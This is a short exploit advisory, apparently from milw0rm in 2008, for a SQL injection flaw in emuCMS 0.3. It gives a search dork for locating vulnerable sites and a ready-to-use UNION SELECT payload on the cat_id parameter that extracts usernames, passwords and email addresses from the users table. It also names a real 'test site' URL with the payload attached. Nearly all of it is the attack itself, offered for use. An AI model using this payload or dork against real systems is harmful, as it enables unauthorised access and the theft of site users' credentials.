emuCMS 0.3 cat_id Remote SQL Injection Vulnerability.pdf

1 ################################################## ####################### 2 # 3 # AUTHOR : TurkishWarriorr 4 # 5 # HOME : http://www.1923turk.org 6 # 7 ################################################## ####################### 8 Dork : Powered by emuCMS 9 10 exploit : index.php?page=category&cat_id=−9999+union+all+select+1,concat(user,char(58),passw ,char(58),email),3,null, null,null,7,8,9,10,11,null +from+users−− 11 12 Test Sites 13 14 http://www.emusoft.org/index.php?page=category&cat_id=−9999+union+all+select+1,concat(user,char(58),passw ,char(58),e mail),3,null,null,null,7,8,9,10,11,null +from+users−− 15 ################################################## ######################## 16 www.1923turk.org 17 turkish−warriorr@hotmail.com 18 19 # milw0rm.com [2008−06−20] Page 1/1 emuCMS 0.3 cat_id Remote SQL Injection Vulnerability TurkishWarriorr 06/20/2008